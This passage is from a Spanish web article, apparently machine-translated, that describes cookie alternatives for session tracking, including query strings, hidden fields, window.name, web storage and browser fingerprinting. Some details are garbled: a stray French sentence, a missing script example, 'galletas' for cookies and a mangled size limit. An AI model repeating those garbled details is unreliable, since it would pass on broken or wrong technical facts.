Una técnica más precisa se basa en incrustar información en las URL. La parte de la cadena de consulta de la URL es una técnica que normalmente se usa para este propósito, pero también se pueden usar otras partes. Tanto el serverlet de Java como los mecanismos de sesión de PHP utilizan este método si las cookies no están habilitadas.

Este método implica que el servidor web agregue solicitudes de cadena a los enlaces de la página web que lo transporta cuando se envía al navegador. Cuando el usuario sigue un enlace, el navegador devuelve la cadena de consulta adjunta al servidor.

Las cadenas de consulta utilizadas para este propósito y las cookies son muy similares, ya que ambas son información elegida arbitrariamente por el servidor y devuelta por el navegador. Sin embargo, existen algunas diferencias: cuando se reutiliza una URL que contiene una cadena de consulta, se envía la misma información al servidor. Por ejemplo, si las preferencias de un usuario están codificadas en una cadena de consulta de una URL y el usuario envía esa URL a otro usuario por correo electrónico, ese usuario también podrá usar esas preferencias.

Por otro lado, cuando un usuario accede a la misma página dos veces, no hay garantía de que se utilice la misma cadena de consulta en ambas ocasiones. Por ejemplo, si un usuario llega a una página desde una página interna del sitio la primera vez y llega a la misma página desde una página externa la segunda vez, la cadena de consulta relativa a la página del sitio suele ser diferente, mientras que las cookies son las mismas. .

Otras desventajas de las cadenas de consulta están relacionadas con la seguridad: mantener los datos que identifican una sesión en las cadenas de consulta permite o simplifica los ataques de fijación de sesión, los ataques de referencia de identificador y otras vulnerabilidades. Pasar ID de sesión como cookies HTTP es más seguro.

Campo de formulario oculto

Una forma de seguimiento de sesión, utilizada por ASP.NET, es usar formularios web con campos ocultos. Esta técnica es muy similar al uso de cadenas de consulta de URL para transportar información y tiene las mismas ventajas y desventajas; y si el formulario se procesa con el método HTTP GET, los campos en realidad pasan a formar parte de la URL del navegador que lo enviará al enviar el formulario. Pero la mayoría de los formularios se procesan con HTTP POST, lo que hace que la información del formulario, incluidos los campos ocultos, se agregue como una entrada adicional que no forma parte de la URL ni es una cookie.

Este enfoque tiene dos ventajas desde la perspectiva del seguimiento: primero, el seguimiento de la información colocada en el código fuente HTML y la entrada POST en lugar de la URL permitirá que el usuario promedio evite este seguimiento; segundo, la información de la sesión no se copia cuando el usuario copia la URL (para guardar la página en el disco o enviarla por correo electrónico, por ejemplo).

ventana.nombre

Todos los navegadores web comunes pueden almacenar una gran cantidad de datos (2 MB a 32 MB) a través de JavaScript utilizando la propiedad window.name del DOM. Estos datos se pueden usar en lugar de las cookies de sesión y también se usan en todos los dominios. La técnica se puede combinar con objetos JSON para almacenar un conjunto complejo de variables de sesión del lado del cliente.

La desventaja es que cada ventana o pestaña separada inicialmente tendrá una ventana.nombre vacía; al navegar por pestañas (abiertas por el usuario) esto significa que las pestañas abiertas individualmente no tendrán nombre de ventana. Además, window.name se puede usar para rastrear a los visitantes en diferentes sitios, lo que puede plantear un problema de privacidad.

En algunos aspectos, esto puede ser más seguro que las cookies, debido a que el servidor no se involucra, lo que lo hace invulnerable al ataque de red de las cookies rastreadoras. Sin embargo, si se toman medidas especiales para proteger los datos, son vulnerables a más ataques, ya que los datos están disponibles a través de otros sitios abiertos en la misma ventana.

autenticación HTTP

El protocolo HTTP incluye los protocolos básicos de autenticación de acceso y el resumen de autenticación de acceso, que permite acceder a una página web solo cuando el usuario ha proporcionado el nombre de usuario y la contraseña. Si el servidor solicita un certificado para otorgar acceso a una página web, el navegador lo solicita al usuario y, una vez obtenido, el navegador lo almacena y lo envía en todas las solicitudes HTTP posteriores. Esta información puede ser usada para localizar al usuario.

Objeto compartido local

Si un navegador incluye el complemento Adobe Flash Player, el objetos compartidos locales se pueden utilizar para el mismo propósito que las cookies. Pueden ser una opción atractiva para los desarrolladores web porque:

  • el límite de tamaño predeterminado para un objeto compartido local es de 100 KB;
  • las comprobaciones de seguridad son independientes de las comprobaciones de cookies del usuario (por lo que se pueden permitir objetos locales compartidos cuando no se permiten las cookies).

Este último punto, que diferencia la política de gestión de cookies de la de los objetos compartidos locales de Adobe genera preguntas sobre la gestión por parte del usuario de su configuración de privacidad: debe ser consciente de que su gestión de las cookies no tiene impacto en la gestión de los objetos compartidos locales, y viceversa.

Otra crítica a este sistema es que solo se puede usar a través del complemento Adobe Flash Player, que es propietario y no un estándar web.

Persistencia del lado del cliente

Algunos navegadores web admiten un mecanismo de persistencia basado en secuencias de comandos, que permite que la página almacene información localmente para su uso posterior. Internet Explorer, por ejemplo, admite información persistente en el historial del navegador, marcadores, en un formato almacenado en XML o directamente con una página web guardada en el disco. Para Microsoft Internet Explorer 5, hay un método de datos de usuario disponible a través de comportamientos DHTML.

El W3C introdujo en HTML 5 una nueva API de JavaScript para el almacenamiento de datos del lado del cliente llamada almacenamiento web y tenía como objetivo reemplazar las cookies de forma permanente. Es similar a las cookies pero con una capacidad muy mejorada y sin almacenar información en el encabezado de las solicitudes HTTP. La API permite dos tipos de almacenamiento web: almacenamiento local y almacenamiento de sesión, similar a las cookies persistentes y las cookies de sesión (excepto que las cookies de sesión caducan cuando se cierra el navegador mientras sesiones de almacenamiento caducan cuando se cierra la pestaña), respectivamente. El almacenamiento web es compatible con Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 y Opera 10.50.

Un mecanismo diferente normalmente se basa en el almacenamiento en caché del navegador (en la memoria en lugar de actualizar) utilizando programas JavaScript en las páginas web. 

Por ejemplo, una página puede contener la etiqueta . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

En este punto, el programa permanece en la memoria caché y la página visitada no se vuelve a cargar por segunda vez. En consecuencia, si el programa contiene una variable global (por ejemplo, var id = 3243242;), este identificador sigue siendo válido y puede ser explotado por otro código JavaScript una vez que la página se vuelve a cargar o una vez que se carga una página que vincula el programa. 

La principal desventaja de este método es que la variable global de JavaScript debe ser estática, lo que significa que no se puede cambiar ni eliminar como una cookie.

huella dactilar del navegador web

Una huella digital del navegador es información recopilada sobre los ajustes de configuración de un navegador con fines de identificación. Estas huellas dactilares se pueden utilizar para identificar total o parcialmente a un usuario de Internet o un dispositivo, incluso cuando las cookies están deshabilitadas.

La información básica de configuración del navegador web ha sido recopilada durante mucho tiempo por los servicios de audiencia del sitio web con el fin de medir con precisión el tráfico web humano y detectar diversas formas de fraude de clics. Con la ayuda de los lenguajes de secuencias de comandos del lado del cliente, la recopilación de información es mucho más precisa. ahora es posible.

Convertir esta información en una cadena de bits produce una huella digital del dispositivo. En 2010, la Electronic Frontier Foundation (EFF) midió la entropía de la huella digital de un navegador para que fuera al menos 18,1 bits de, y eso fue antes de que los avances en la toma de huellas dactilares del lienzo añadieran 5,7 bits a esa entropía.

Galletas en pocas palabras

Las cookies son pequeños archivos de texto almacenados por el navegador web en el disco duro de un visitante del sitio web y que se utilizan (entre otras cosas) para registrar información sobre el visitante o su viaje por el sitio. El webmaster puede así reconocer los hábitos de un visitante y personalizar la presentación de su sitio para cada visitante; las cookies permiten entonces recordar cuántos artículos mostrar en la página de inicio o incluso conservar las credenciales de inicio de sesión para cualquier parte privada: cuando el visitante vuelve al sitio, ya no es necesario que escriba su nombre y contraseña para ser reconocidos, ya que se leen automáticamente en la cookie.

Una cookie tiene una vida útil limitada, establecida por el diseñador del sitio. También pueden caducar al final de la sesión en el sitio, lo que corresponde al cierre del navegador. Las cookies se utilizan ampliamente para facilitar la vida de los visitantes y presentarles información más relevante. Pero técnicas especiales hacen posible seguir a un visitante en varios sitios y así recopilar y cotejar información muy extensa sobre sus hábitos. Este método le ha dado al uso de cookies una reputación como técnica de vigilancia que viola la privacidad de los visitantes, lo que lamentablemente corresponde a la realidad en muchos casos de uso por razones no técnicas o no respetuosas con las expectativas del usuario.

En respuesta a estos temores legítimos, HTML 5 presenta una nueva API de JavaScript para el almacenamiento de datos del lado del cliente llamada almacenamiento web, que es mucho más segura y con mayor capacidad, cuyo objetivo es reemplazar las cookies.

almacenamiento de galletas

Con algunos navegadores, una cookie se puede editar fácilmente, un editor de texto simple como el Bloc de notas es suficiente para cambiar sus valores manualmente.

Las cookies se guardan de forma diferente según el navegador:

  • Microsoft Internet Explorer guarda cada cookie en un archivo diferente;
  • Mozilla Firefox guarda todas sus cookies en un único archivo;
  • Opera guarda todas sus cookies en un único archivo y las encripta (imposible modificarlas excepto en las opciones del software);
  • Apple Safari guarda todas sus cookies en un único archivo de extensión .plist. La modificación es posible pero no muy fácil, a menos que pase por las opciones del software.

Los navegadores son necesarios para soportar el mínimo :

  • 300 galletas simultáneas;
  • 4 o por galleta;
  • 20 cookies por host o dominio.
[Total: 0 Significar: 0]

Escrito por Editores de Reseñas

El equipo de editores expertos dedica su tiempo a investigar productos, realizar pruebas de práctica, entrevistar a profesionales de la industria, revisar reseñas de consumidores y redactar todos nuestros resultados como resúmenes comprensibles y completos.

Dejar un comentario

Su dirección de correo electrónico no será publicada. Los campos necesarios están marcados con *

¿Qué piensas?

384 Puntos
Upvote Downvote